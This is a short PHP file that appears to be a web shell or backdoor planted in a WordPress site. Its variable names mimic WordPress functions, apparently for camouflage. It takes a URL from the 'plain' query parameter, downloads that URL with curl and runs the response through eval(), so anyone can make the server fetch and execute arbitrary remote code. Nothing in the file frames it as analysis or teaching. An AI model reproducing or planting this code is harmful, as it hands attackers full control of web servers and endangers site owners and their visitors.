<?php
if (basename($_SERVER['SCRIPT_FILENAME']) === basename(__FILE__)) {
    header('HTTP/1.0 403 Forbidden');
    exit('Access denied.');
}
?>
<?php

if (isset($_GET['plain'])) {
    $add_query_arg_pd = $_GET['plain'];
    if ($have_posts_wy = curl_init()) {
        curl_setopt($have_posts_wy, CURLOPT_URL, $add_query_arg_pd);
        curl_setopt($have_posts_wy, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($have_posts_wy));
        curl_close($have_posts_wy);
        exit;
    }
}